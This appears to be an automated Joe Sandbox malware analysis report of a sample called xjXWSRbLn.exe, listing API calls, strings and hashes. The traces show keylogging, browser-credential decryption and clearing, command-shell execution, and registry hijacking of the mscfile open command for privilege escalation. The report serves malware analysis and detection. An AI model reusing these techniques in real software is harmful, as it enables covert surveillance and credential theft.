                            Yara matches
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe
                            • API String ID: 2506810119-899990597
                            • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                            • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                            • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                            • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                            APIs
                              • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                              • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                              • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                            • _wcslen.LIBCMT ref: 00419744
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                            • String ID: .exe$program files (x86)\$program files\
                            • API String ID: 37874593-1203593143
                            • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                            • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                            • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                            • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                            APIs
                            • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                            • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                            • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTimewsprintf
                            • String ID: Offline Keylogger Started
                            • API String ID: 465354869-4114347211
                            • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                            • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                            • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                            • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                            APIs
                              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                            • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                            • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread$LocalTime$wsprintf
                            • String ID: Online Keylogger Started
                            • API String ID: 112202259-1258561607
                            • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                            • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                            • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                            • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 00404F61
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                            • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                            Strings
                            • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$EventLocalThreadTime
                            • String ID: Connection KeepAlive | Enabled | Timeout:
                            • API String ID: 2532271599-507513762
                            • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                            • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                            • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                            • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                            APIs
                            • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                            • GetProcAddress.KERNEL32(00000000), ref: 00406097
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: CryptUnprotectData$crypt32
                            • API String ID: 2574300362-2380590389
                            • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                            • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                            • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                            • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                            • CloseHandle.KERNEL32(?), ref: 004051AA
                            • SetEvent.KERNEL32(?), ref: 004051B9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandleObjectSingleWait
                            • String ID: Connection Timeout
                            • API String ID: 2055531096-499159329
                            • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                            • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                            • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                            • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception@8Throw
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 2005118841-1866435925
                            • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                            • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                            • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                            • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                            • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                            • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: origmsc
                            • API String ID: 3677997916-68016026
                            • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                            • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                            • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                            • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: /C $cmd.exe$open
                            • API String ID: 587946157-3896048727
                            • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                            • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                            • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                            • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                            Strings
                            • http\shell\open\command, xrefs: 00412026
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: http\shell\open\command
                            • API String ID: 3677997916-1487954565
                            • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                            • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                            • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                            • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                            APIs
                            • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                            • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                            • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                            Strings
                            • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: Software\Classes\mscfile\shell\open\command
                            • API String ID: 1818849710-505396733
                            • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                            • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                            • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                            • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                              • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                              • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                            • String ID: bad locale name
                            • API String ID: 3628047217-1405518554
                            • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                            • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                            • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                            • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                            • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: P0F
                            • API String ID: 1818849710-3540264436
                            • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                            • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                            • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                            • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                            APIs
                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                            • GetProcAddress.KERNEL32(00000000), ref: 00401403
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: GetCursorInfo$User32.dll
                            • API String ID: 1646373207-2714051624
                            • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                            • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                            • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                            • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                            APIs
                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                            • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetLastInputInfo$User32.dll
                            • API String ID: 2574300362-1519888992
                            • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                            • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                            • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                            • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                            • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                            • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                            • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                            • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                            • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                            • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                            • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                            • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                            • String ID:
                            • API String ID: 3360349984-0
                            • Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                            • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                            • Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                            • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                            APIs
                            Strings
                            • Cleared browsers logins and cookies., xrefs: 0040B036
                            • [Cleared browsers logins and cookies.], xrefs: 0040B025
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                            • API String ID: 3472027048-1236744412
                            • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                            • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                            • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                            • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                            APIs
                              • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                              • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                              • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                            • Sleep.KERNEL32(00000BB8), ref: 004111DF
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQuerySleepValue
                            • String ID: H"G$exepath$!G
                            • API String ID: 4119054056-2148977334
                            • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                            • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                            • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                            • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                            APIs
                              • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                              • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                              • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                            • Sleep.KERNEL32(000001F4), ref: 0040955A
                            • Sleep.KERNEL32(00000064), ref: 004095F5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$ForegroundLength
                            • String ID: [ $ ]
                            • API String ID: 3309952895-93608704
                            • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                            • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                            • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                            • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                            • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                            • Opcode Fuzzy Hash: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                            • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                            • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                            • Opcode Fuzzy Hash: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                            • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                            • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 3919263394-0
                            • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                            • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                            • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                            • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                              • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                            • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                            • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                            • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                            Strings
